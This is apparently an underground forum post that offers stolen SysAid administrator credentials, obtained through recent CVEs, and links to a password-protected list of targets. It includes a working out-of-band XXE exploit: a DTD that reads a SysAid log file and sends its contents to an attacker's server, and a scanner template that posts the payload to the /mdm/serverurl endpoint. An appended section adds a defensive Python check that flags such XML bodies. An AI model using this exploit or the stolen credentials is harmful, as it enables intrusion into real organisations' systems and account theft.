- Price
- 0
- Contacts
- @sart0rix
XSS, got some SysAid admin creds from recent CVEs (2025-2775/2776/2777). Tested May 8, 2025. Sharing three to start, with PoCs showing login and one exploitation. More targets in the list.
Samples:
Full list: pastebin[.]com/BT7ck8u3
Pass: 8xJ9Zj1LmH
Note: Some creds might not work if targets have changed their passwords. Message me if there are issues; I'll verify and fix where possible.
If you are trying to reproduce the exploit, here is my custom template for returning the sensitive
step1: create a dtd file:
step2: start an Apache server and a second web server, like a Python server, and run the template
Code:
<!ENTITY % d SYSTEM "file:///C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://PYTHON-SERVER/?e=%d;'>">
Code:
id: xxe-static-payload-cdl
info:
name: Static XXE Payload Injection (CDL)
author: yourname
severity: high
description: Sends a static XXE payload to test for XML External Entity vulnerabilities.
tags: xxe, injection, xml
http:
- method: POST
path:
- "{{BaseURL}}/mdm/serverurl"
headers:
Content-Type: application/xml
body: |
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://APACHE-SERVER/cus.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
Last edited:
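A defender-side pre-parse check for the request shape in the template above, added here as an example and not part of the original post: it flags XML bodies that carry a DOCTYPE, external entity declarations or parameter entities before they reach a parser. The function names, finding labels and the benign sample body are assumptions made for illustration; the flagged sample reuses the body from the post with its placeholder host.

```python
import codecs
import re

# External entity declaration, general or parameter: <!ENTITY [%] name SYSTEM|PUBLIC ...
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b")
# Parameter entity declaration: <!ENTITY % name ...
PARAM_DECL_RE = re.compile(r"<!ENTITY\s+%\s")
# Parameter entity reference such as %asd;
PARAM_REF_RE = re.compile(r"%[A-Za-z_:][\w.:-]*;")
# DOCTYPE that points at an external subset: <!DOCTYPE root SYSTEM|PUBLIC ...
EXT_SUBSET_RE = re.compile(r"<!DOCTYPE\s+[^\s\[>]+\s+(?:SYSTEM|PUBLIC)\b")

BOMS = ((codecs.BOM_UTF8, "utf-8"), (codecs.BOM_UTF16_LE, "utf-16-le"),
        (codecs.BOM_UTF16_BE, "utf-16-be"))

def decode_body(raw: bytes) -> str:
    """Honour a byte-order mark so a UTF-16 body is not missed by byte matching."""
    for bom, enc in BOMS:
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc, errors="replace")
    return raw.decode("utf-8", errors="replace")

def xxe_findings(raw: bytes) -> list[str]:
    """Return the DTD features found in an XML request body, in a fixed order."""
    text = decode_body(raw)
    start = text.find("<!DOCTYPE")
    if start < 0:
        return []
    dtd = text[start:]
    checks = (("external-dtd-subset", EXT_SUBSET_RE),
              ("external-entity-declaration", EXT_ENTITY_RE),
              ("parameter-entity-declaration", PARAM_DECL_RE),
              ("parameter-entity-reference", PARAM_REF_RE))
    return ["doctype-present"] + [name for name, rx in checks if rx.search(dtd)]

# Body from the post's template, placeholder host unchanged.
POST_BODY = (b'<?xml version="1.0"?>\n'
             b'<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://APACHE-SERVER/cus.dtd">%asd;%c;]>\n'
             b'<cdl>&rrr;</cdl>')
# Constructed benign body; the element layout is an assumption.
BENIGN_BODY = b'<?xml version="1.0"?>\n<cdl><url>https://helpdesk.example/</url></cdl>'
# Same flagged body re-encoded as UTF-16 with a byte-order mark.
UTF16_BODY = codecs.BOM_UTF16_LE + POST_BODY.decode("ascii").encode("utf-16-le")

if __name__ == "__main__":
    for label, body in (("post", POST_BODY), ("benign", BENIGN_BODY), ("utf16", UTF16_BODY)):
        print(label, xxe_findings(body))
```

A check like this complements disabling DTD processing in the XML parser and does not replace it; a UTF-16 body sent without a byte-order mark is outside what this sketch decodes.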